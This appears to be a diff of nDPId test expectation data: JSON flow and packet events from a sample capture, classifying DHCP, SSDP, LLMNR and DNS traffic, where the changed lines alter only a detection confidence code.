+00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104373741,"flow_last_seen":1470104373741,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104373741,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104375419,"flow_last_seen":1470104375419,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104375419,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1470104375419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104375419,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0ZDJAAEAGzmrAqAUQROn9hdFlAFAG4xw3xV6fSoAREAEocwAAAQEIChoPAavPGvHS"} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6uKxv2MGbCABFAAClQRIAAAQRv2HAqAUy7\/\/\/+vyiB2wAkVLKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1470104376017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376017,"pkt":"AQBef\/\/6SNIkYwreCABFAAChfhwAAAERhWTAqAUp7\/\/\/+tgQB2wAjcOhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376017,"flow_last_seen":1470104376017,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104376017,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":55312,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1470104376203,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376203,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMIoAAAER0ubAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00618{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1470104376301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104376301,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOpEAAAERyOzAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1470104376301,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104376301,"pkt":"\/\/\/\/\/\/\/\/cD6s8PAHCABFAAFIDscAAP8Rq94AAAAA\/\/\/\/\/wBEAEMBNJGnAQEGAAYPv1sAAAAAAAAAAAAAAAAAAAAAAAAAAHA+rPDwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwcBeQMGD3f8OQIF3D0HAXA+rPDwBzIEwKgD7TMEAHanAAwEU2hlbv8AAAAAAAAAAAAAAAAAAAAA"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 
+00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376301,"flow_last_seen":1470104376301,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104376301,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"shen","fingerprint":"1,121,3,6,15,119,252","class_ident":""}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1470104376816,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104376816,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiWgLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACAAA="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104376816,"flow_last_seen":1470104376816,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104376816,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1470104377223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104377223,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAAFIAAAAABARcfzAqHcB\/\/\/\/\/wBDAEQBNGjoAgEGAOGY7R0AAIAAwKgDVsCoA1bAqHcBAAAAAMjTo5OjcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQEKgioX8MMe8wtdP8AAAAA"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104377634,"pkt":"MzMAAQADzD2CHu7jht1gAAAAACARAf6AAAAAAAAA7fUkCsjAgxL\/AgAAAAAAAAAAAAAAAQAD8KMU6wAgDOCgAAAAAAEAAAAAAAAGUk9fWDFDAAD\/AAE="} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104377634,"pkt":"AQBeAAD8zD2CHu7jCABFAAA0LRcAAAER5c7AqAUv4AAA\/PCjFOsAIMFmoAAAAAABAAAAAAAABlJPX1gxQwAA\/wAB"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00623{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1470104377634,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104377634,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLQAAAQRv8LAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377634,"flow_last_seen":1470104377634,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104377634,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1470104377720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 
-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377720,"flow_last_seen":1470104377720,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1470104377720,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1470104377720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1470104377720,"pkt":"AQBeAAD8ABxCjnAxCABFAAAyUcEAAAERU03AqHMI4AAA\/MkCFOsAHtPcYF4AAAABAAAAAAAABHdwYWQAAAEAAQ=="} 
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104377734,"flow_last_seen":1470104377734,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1470104377734,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":51024,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1470104377734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1470104377734,"pkt":"TF4M6gNlABxCjnAxCABFAABCUcIAAIARpSjAqHMICAgICMdQADUALoWI\/SwBAAABAAAAAAAAAmpwBmthbmthbgUxa3h1bgRtb2JpAAABAAE="} 